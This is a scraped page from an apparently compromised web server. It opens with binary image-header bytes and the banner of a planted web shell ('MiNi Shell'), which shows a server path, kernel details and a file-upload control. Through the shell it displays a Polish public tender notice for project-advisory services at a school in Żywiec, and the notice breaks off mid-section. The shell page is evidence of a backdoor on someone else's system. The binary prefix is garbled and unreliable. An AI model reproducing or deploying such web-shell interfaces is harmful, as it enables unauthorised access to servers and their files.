JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230811/0035066901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi doradcze w zakresie realizacji i rozliczenia projektu „Utworzenie Branżowego Centrum Umiejętności przy Zespole Szkół Mechaniczno-Elektrycznych w Żywcu w dziedzinie energetyki odnawialnej... </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZESPÓŁ SZKÓŁ MECHANICZNO-ELEKTRYCZNYCH W ŻYWCU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zespół Szkół Mechaniczno - Elektrycznych w Żywcu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000187837</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Komisji Edukacji Narodowej 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żywiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 33 861 34 28</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 33 861 34 28</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@zsme.zywiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zsme.zywiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi doradcze w zakresie realizacji i rozliczenia projektu „Utworzenie Branżowego Centrum Umiejętności przy Zespole Szkół Mechaniczno-Elektrycznych w Żywcu w dziedzinie energetyki odnawialnej... </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b5f699b9-3815-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00350669</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zamówienie realizowane jest w ramach Projektu pn.: „Utworzenie Branżowego Centrum Umiejętności przy Zespole Szkół Mechaniczno-Elektrycznych w Żywcu w dziedzinie energetyki odnawialnej (słonecznej)”. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-b5f699b9-3815-11ee-a60c-9ec5599dddc1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz – w szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, poczty elektronicznej pod adresem: biuro@zsme.zywiec.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”);<br/>2)	W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny);<br/>3)	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia;<br/>4)	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”;<br/>5)	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza);<br/>6)	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia;<br/>Dalsze zapisy w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), zwanym dalej RODO, informuję, że:<br/>1)	administratorem Pani/Pana danych osobowych w Zespole Szkół Mechaniczno-Elektrycznych w Żywcu, ul. Komisji Edukacji Narodowej 3, 34-300 Żywiec jest Dyrektor Zespołu Szkół Mechaniczno-Elektrycznych w Żywcu;<br/>2)	inspektorem ochrony danych osobowych w Zespole Szkół Mechaniczno-Elektrycznych w Żywcu jest Michał Zapart, email: mikez1@op.pl;<br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez przeprowadzania negocjacji;<br/>4)	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 – 19 oraz 74 – 76 ustawy;<br/>5)	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanych z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy;<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>Dalsze zapisy w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSME.DS.26.21.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są usługi doradcze w zakresie realizacji i rozliczenia projektu „Utworzenie Branżowego Centrum Umiejętności przy Zespole Szkół Mechaniczno-Elektrycznych w Żywcu w dziedzinie energetyki odnawialnej (słonecznej).” Celem przedsięwzięcia jest wsparcie przygotowania kadr na potrzeby nowoczesnej gospodarki w branży instalacji elektrycznych ze wskazaniem energetyki odnawialnej - słonecznej, poprzez zapewnienie przestrzeni dla innowacyjnej i trwałej współpracy biznesu z edukacją zawodową na wszystkich poziomach kształcenia zawodowego, a także wdrożenie koncepcji doskonałości zawodowej w polskim systemie kształcenia zawodowego. <br/>2.	Celem przedsięwzięcia jest wsparcie przygotowania kadr na potrzeby nowoczesnej gospodarki w branży energetyki odnawialnej - słonecznej, poprzez utworzenie Branżowego Centrum Umiejętności, zapewnienie przestrzeni dla innowacyjnej i trwałej współpracy biznesu z edukacją zawodową na wszystkich poziomach kształcenia zawodowego, a także wdrożenie koncepcji doskonałości zawodowej w polskim systemie kształcenia zawodowego. Będzie to realizowane poprzez remont, adaptację i wyposażenie pomieszczeń Zespołu Mechaniczno-Elektrycznych w Żywcu oraz poprzez przeprowadzenie szeregu szkoleń mających na celu:<br/>a)	kształcenie nowych kadr w zakresie energetyki odnawialnej (słonecznej),<br/>b)	podnoszenie kwalifikacji dorosłych i młodych wykonujących prace instalatorskie poprzez zwiększenie wiedzy i praktyki w zakresie stosowania nowoczesnych technik instalatorskich,<br/>c)	podnoszenie kwalifikacji kadry naukowej, w tym nauczycieli zawodów związanych z projektem.<br/>d)	przekazanie wiedzy i doświadczenia tak branży naukowej (uczelnia wyższa) jak i sfery biznesu (stowarzyszenia zrzeszające firmy z branż instalatorskich jak również same przedsiębiorstwa), poprzez udział tych podmiotów w prowadzeniu zaplanowanych zajęć dydaktycznych.<br/>3.	Na potrzeby utworzenia i funkcjonowania BCU zawiązano formalne partnerstwo z 11 podmiotami reprezentującymi: podmiot branżowy - Krajowa Izba Klastrów Energii i OZE, uczelnie wyższe w tym Politechnika Śląska, Politechnika Krakowska, ATH, WSB, organizacje branżowe Beskidzka Rada Federacji Stowarzyszeń Naukowo Technicznych NOT w Bielsku-Białej, Katowicka Specjalna Strefa Ekonomiczna Spółka Akcyjna, ZIAD Bielsko-Biała Spółka Akcyjna oraz przedsiębiorstwa branżowe: EKOSUN Sp. z o.o., MCD ELECTRONICS Sp. z o.o., FRONIUS POLSKA Sp. z o.o., PGE Energia Odnawialna Spółka Akcyjna Oddział ZEW Porąbka-Żar w Międzybrodziu Bialskim.<br/>4.	Wartość projektu zgodnie z wnioskiem aplikacyjnym wynosi 13 730 729,80 PLN.<br/>5.	Zakres przedmiotu zamówienia obejmuje usługi doradcze w zakresie realizacji i rozliczenia projektu „Utworzenie Branżowego Centrum Umiejętności przy Zespole Szkół Mechaniczno-Elektrycznych w Żywcu w dziedzinie energetyki odnawialnej (słonecznej)” przez minimum 3 skierowane osoby w zakresie nadzoru, realizacji, rozliczania finansowego i sprawozdawczości dla projektu, w tym w szczególności:<br/>1)	Stanowisko: Kierownik Projektu <br/>Podstawowym obowiązkiem Kierownika Projektu będzie zagwarantowanie, by projekt wytwarzał wymagane rezultaty w ustalonym horyzoncie czasu, w ramach zaplanowanych kosztów, dbając o zapewnienie wysokiej jakości projektu. W ramach swoich obowiązków Kierownik Projektu będzie: <br/>a)	współpracować z FRSE (Fundacja rozwoju systemu edukacji) i Kierownikiem BCU, na wszystkich szczeblach realizacji projektu, <br/>b)	nadzorować i opiniować kwartalne sprawozdania, tzw. wnioski o płatność oraz końcowy wniosek o płatność, <br/>c)	uczestniczyć w spotkaniach Rady BCU, <br/>d)	koordynować harmonogram realizacji projektu, <br/>e)	konsultować wzory dokumentów rekrutacyjnych, szkoleniowych, odbiorowych wytwarzanych na etapie realizacji projektu, <br/>f)	utrzymywać kontakty z zewnętrznymi wykonawcami lub osobami zarządzającymi relacjami z użytkownikiem,<br/>g)	kierować i motywować Zespół Projektowy,<br/>h)	zarządzać przepływami informacji w projekcie, <br/>i)	zarządzać wytwarzaniem wymaganych rezultatów, przyjmując odpowiedzialność za całościowe postępy oraz gdy to konieczne, inicjować działania korygujące,<br/>j)	przygotowywać i zarządzać procedurami projektu, takimi, jak zarządzanie ryzykiem, sterowanie zagadnieniami i zmianami oraz komunikacją,<br/>k)	przygotowywać i zarządzać mechanizmami sterowania projektem – monitorowanie i raportowanie,<br/>l)	zezwalać na wykonanie grup zadań. <br/>2)	Stanowisko: Specjalista ds. administracji <br/>Podstawowym obowiązkiem Specjalisty ds. administracji będzie świadczenie usług administracyjnych, dbając o zapewnienie wysokiej jakości projektu. Do obowiązków Specjalisty ds. administracji będzie należało: <br/>a)	bieżący kontakt z opiekunem projektu ze strony FRSE <br/>b)	sporządzanie kwartalnych wniosków o płatność,<br/>c)	aktualizowanie harmonogramów płatności,<br/>d)	prowadzenie i archiwizacja dokumentacji dotyczącej rozliczenia projektu,<br/>e)	edycja dokumentów i pism dotyczących projektu,<br/>f)	współpraca przy opracowywaniu wzorów dokumentów projektowych, <br/>g)	współpraca przy działaniach promocyjnych projektu zaplanowanych w projekcie, w tym zapewnienie informowania społeczeństwa o współfinansowaniu projektu przez Unię Europejską, zgodnie z wymogami zawartymi w umowie o dofinansowanie projektu oraz dokumentacji konkursowej,<br/>h)	bieżące informowanie Kierownika projektu o przebiegu swojej pracy i powierzonych zadaniach, natychmiastowe zgłaszanie mu wszelkich wątpliwości dot. realizacji Projektu, w tym udział w spotkaniach zespołu roboczego projektu,<br/>i)	ścisła współpraca z pozostałymi członkami zespołu.<br/>3)	Stanowisko: Specjalista ds. zamówień publicznych<br/>Podstawowym obowiązkiem Specjalisty ds. zamówień publicznych będzie kompleksowa obsługa postępowań w sprawie zamówień publicznych w oparciu o Ustawę Prawo Zamówień Publicznych i Wytyczne dotyczące kwalifikowalności wydatków na lata 2021-2027 w wersji obowiązującej w dniu publikacji postępowania publicznego. Zamawiający przewiduje przygotowanie i przeprowadzenie 7 (siedmiu) postępowań o udzielenie zamówienia o wartości równej albo przekraczającej 130 000,00 zł netto, dla którego stosuje się przepisy ustawy Prawo zamówień publicznych, jak również 10 (dziesięć) postępowań, dla których nie stosuje się przepisów powyższej ustawy. W ramach swoich obowiązków Specjalista ds. zamówień publicznych będzie zobowiązany do:<br/>a)	weryfikacji pod względem formalno-prawnym opisu przedmiotu zamówienia;<br/>b)	wyboru trybu postępowania;<br/>c)	ustalenia w porozumieniu z Zamawiającym warunków udziału w postępowaniu jakie muszą spełniać wykonawcy;<br/>d)	ustalenie w porozumieniu z Zamawiającym kryteriów oceny ofert;<br/>e)	sporządzenia wzoru umowy;<br/>f)	sporządzenia dokumentacji zamówienia, uzyskania zatwierdzenia przez Zamawiającego przygotowanej przez Wykonawcę kompletnej dokumentacji; <br/>g)	sporządzenia i wysłania do odpowiedniego publikatora w imieniu Zamawiającego ogłoszenia o zamówieniu;<br/>h)	sporządzenia w imieniu Zamawiającego pod względem formalno-prawnym odpowiedzi na pytania do dokumentacji, prowadzenia w tym zakresie korespondencji z Wykonawcami;<br/>i)	sporządzenia w imieniu Zamawiającego modyfikacji dokumentacji;<br/>j)	sporządzenia oraz umieszczania w odpowiednim publikatorze w imieniu Zamawiającego ogłoszeń o zmianie ogłoszenia o zamówieniu; <br/>k)	sporządzenia w imieniu Zamawiającego odpowiedzi na informacje wniesione przez wykonawców na czynności podjęte lub zaniechane przez Zamawiającego;<br/>l)	obsługi kancelaryjnej postępowania, tj. korespondencja z Wykonawcami, dokumentowanie czynności w postępowaniu;<br/>m)	udzielania wyjaśnień Zamawiającemu w sprawie przygotowanych dokumentów;<br/>n)	udziału w pracach komisji przetargowej – o ile dotyczy;<br/>o)	badania i oceny ofert złożonych w postępowaniu w sprawie zamówienia publicznego;<br/>p)	sporządzenia i wysyłki w imieniu Zamawiającego ustawowo wymaganych pism (m.in. wezwań, zawiadomień, informacji) kierowanych w toku badania i oceny ofert, korespondencji z wykonawcami,<br/>q)	sporządzenia i wysyłki w imieniu Zamawiającego rozstrzygnięć postępowania, zawiadomienia wykonawców, <br/>r)	przygotowywania protokołu z postępowania;<br/>s)	sporządzenia umowy z wybranym wykonawcą;<br/>t)	sporządzenia oraz umieszczania w odpowiednim publikatorze w imieniu Zamawiającego ogłoszenia o udzieleniu zamówienia;<br/>u)	przekazania Zamawiającemu kompletu dokumentów w wersji elektronicznej każdego przeprowadzonego postępowania o udzielenie zamówienia publicznego objętego niniejszą umową.<br/>4)	Stanowisko: Specjalista ds. prawnych<br/>Podstawowym obowiązkiem Specjalisty ds. prawnych będzie świadczenie konsultacji prawnych w okresie działalności BCU, w tym analizy prawnej znowelizowanej ustawy Prawo oświatowe, przygotowania statutu BCU, przygotowania projektu uchwały dla Rady Powiatu w celu włączenia BCU do zespołu szkół i wpisania do systemu oświaty. Przewiduje się świadczenie konsultacji prawnych w wymiarze do 90 godzin. Zwiększenie wymiaru godzin wyłącznie za uprzednią decyzją Zamawiającego. <br/>6.	Zamawiający żąda osobistej obecności osoby skierowanej do realizacji obowiązków Kierownika Projektu w siedzibie Zamawiającego w Żywcu, przy ul. Komisji Edukacji Narodowej 3, 34-300 Żywiec w całym okresie obowiązywania umowy w wymiarze minimum dwóch dni roboczych (od poniedziałku do piątku) w każdym tygodniu przez minimum 5 godzin w każdym dniu. Ponadto cały wskazany w pkt 5 personel winien być dostępny na każde wezwanie Zamawiającego w następnym dniu roboczym po zgłoszeniu. <br/>7.	Zamawiający wymaga, aby osoba wykonująca czynności w trakcie realizacji zamówienia polegające na pełnienie funkcji Kierownika Projektu, była zatrudniona przez Wykonawcę na podstawie stosunku pracy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72224000-1 - Usługi doradcze w zakresie zarządzania projektem</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert i wyborze najkorzystniejszej oferty zamawiający będzie się kierował następującymi kryteriami: Cena (C) – 60%, Doświadczenie zawodowe Kierownika Projektu skierowanego przez Wykonawcę do realizacji zamówienia publicznego (D) – 40%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie zawodowe Kierownika Projektu skierowanego przez Wykonawcę do realizacji zamówienia publicznego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.2.1.	zdolności do występowania w obrocie gospodarczym:<br/><br/>Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/><br/>1.2.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający nie precyzuje w tym zakresie szczegółowych warunków.<br/><br/>1.2.3.	sytuacji 